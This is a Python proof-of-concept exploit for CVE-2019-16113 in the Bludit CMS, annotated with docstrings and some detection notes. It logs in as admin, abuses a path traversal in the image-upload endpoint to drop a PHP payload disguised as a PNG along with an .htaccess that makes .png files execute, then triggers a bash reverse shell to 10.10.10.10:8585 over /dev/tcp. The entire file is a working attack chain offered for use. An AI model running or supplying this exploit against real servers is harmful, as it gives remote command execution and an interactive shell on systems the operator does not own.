CVE-2019-16113.py
#!/usr/bin/env python
import requests
import re
# PoC by @hg8
# Credit: @christasa
# https://github.com/bludit/bludit/issues/1081
# Base URL of the Bludit instance and the admin credentials that
# admin_login() posts to /admin/; the shipped values are placeholders.
url = "http://bludit-example.com"
user = "admin"
password = "admin"
# Shell command that upload_shell() embeds inside the PHP payload via
# shell_exec(). The shipped value is a bash reverse shell; the
# 10.10.10.10:8585 endpoint in it is a placeholder listener address.
cmd = "bash -c 'bash -i >& /dev/tcp/10.10.10.10/8585 0>&1'"
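def admin_login():
    """Log in to the Bludit admin panel and return the authenticated session.

    Fetches ``/admin/`` to read the ``tokenCSRF`` hidden field of the login
    form, then POSTs the module-level ``user``/``password`` together with that
    token without following redirects.

    Returns:
        requests.Session: the session carrying the admin cookie.

    Raises:
        SystemExit: if the CSRF field is not found in the login page, or if
            the login response is not a 301 (the PoC treats any other status
            as rejected credentials). Exit status is non-zero on failure,
            whereas the original ``exit()`` call returned 0.
    """
    s = requests.Session()
    login_page = s.get(f"{url}/admin/")
    # The original called .group(1) directly on re.search(), which raises
    # AttributeError (not a readable failure) on any page lacking the field.
    match = re.search('"tokenCSRF".+?value="(.+?)"', login_page.text)
    if match is None:
        raise SystemExit("[!] Could not find tokenCSRF on the login page.")
    csrf_token = match.group(1)
    data = {
        "username": user,
        "password": password,
        "tokenCSRF": csrf_token,
    }
    r = s.post(f"{url}/admin/", data, allow_redirects=False)
    # A successful login answers with a redirect; anything else is a failure.
    if r.status_code != 301:
        print("[!] Username or password incorrect.")
        # SystemExit instead of the site-module exit() builtin, which is not
        # guaranteed to exist when the script runs without the site module.
        raise SystemExit(1)
    print("[+] Loggin successful.")
    return s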
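def get_csrf(s):
    """Extract the JavaScript ``tokenCSRF`` value from the admin dashboard.

    Args:
        s: an authenticated requests.Session as returned by admin_login().

    Returns:
        str: the value embedded as ``var tokenCSRF = "..."`` in the page.

    Raises:
        SystemExit: if the marker is absent (for example because the session
            is not actually logged in). The original ``split(...)[1]`` raised
            an unexplained IndexError in that case.
    """
    r = s.get(f"{url}/admin/")
    # partition() on the marker is equivalent to split(marker)[1] for the
    # first occurrence, but lets us detect "marker not present" explicitly.
    _, marker, after_marker = r.text.partition('var tokenCSRF = "')
    if not marker:
        raise SystemExit("[!] Could not find tokenCSRF in the admin page.")
    # Token runs up to the closing double quote.
    csrf_token, _, _ = after_marker.partition('"')
    print(f"[+] Token CSRF: {csrf_token}")
    return csrf_token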
def upload_shell(s, csrf_token):
    """Upload the PHP payload and an .htaccess through the image-upload endpoint.

    Both POSTs go to ``/admin/ajax/upload-images`` with ``uuid`` set to
    ``../../tmp``; the ``../`` in that field is the path traversal, and
    execute_cmd() later fetches the result from ``/bl-content/tmp/``.

    Args:
        s: authenticated admin session.
        csrf_token: token returned by get_csrf().

    Detection notes, all visible in the requests below: an admin image upload
    whose ``uuid`` parameter contains ``../``, an ``images[]`` part whose
    filename is ``.htaccess``, and a body starting with a PHP open tag that
    is declared as ``image/png``.
    """
    data = {
        "uuid": "../../tmp",  # traversal out of the expected upload folder
        "tokenCSRF": csrf_token
    }
    # The "image" body is PHP: it removes the dropped .htaccess and itself,
    # then runs the module-level cmd through shell_exec().
    multipart = [('images[]', ("blut.png", "<?php shell_exec(\"rm .htaccess;rm blut.png;" + cmd + "\");?>", 'image/png'))]
    r = s.post(f"{url}/admin/ajax/upload-images", data, files=multipart)
    # NOTE(review): a non-200 reply only prints the two lines below; the
    # function does not stop, and the "succesful" line is printed regardless.
    if r.status_code != 200:
        print("[!] Error uploading Shell.")
        print("[!] Make sure Bludit version >= 3.9.2.")
    print("[+] Shell upload succesful.")
    # The .htaccess turns rewriting off and asks Apache to hand .png files to
    # the PHP handler, so the GET in execute_cmd() runs blut.png instead of
    # serving it. Same status handling caveat as above.
    multipart_htaccess = [('images[]', ('.htaccess', "RewriteEngine off\r\nAddType application/x-httpd-php .png", 'image/png'))]
    r = s.post(url + "/admin/ajax/upload-images", data, files=multipart_htaccess)
    if r.status_code != 200:
        print("[!] Error uploading .htaccess.")
        print("[!] Make sure Bludit version >= 3.9.2.")
    print("[+] .htaccess upload succesful.")
def execute_cmd(s):
    """Request the uploaded blut.png so the server runs it as PHP.

    Args:
        s: the session used for the upload (reused here for the GET).

    The request has a 1 s timeout and swallows only ReadTimeout: with a
    reverse shell as cmd the PHP stays blocked and the response never
    arrives, which the PoC treats as success. Other requests exceptions
    propagate. The success line is printed unconditionally -- ``r`` is never
    inspected, so a 404 (nothing was uploaded) or a 200 that merely served
    the file prints the same message.
    """
    try:
        r = s.get(f"{url}/bl-content/tmp/blut.png", timeout=1)
    except requests.exceptions.ReadTimeout:
        pass
    print("[+] Command Execution Successful.")
if __name__ == '__main__':
    # Exploit chain: authenticate, read the dashboard CSRF token, drop the
    # payload and .htaccess, then trigger the payload with one GET.
    sess = admin_login()
    token = get_csrf(sess)
    upload_shell(sess, token)
    execute_cmd(sess)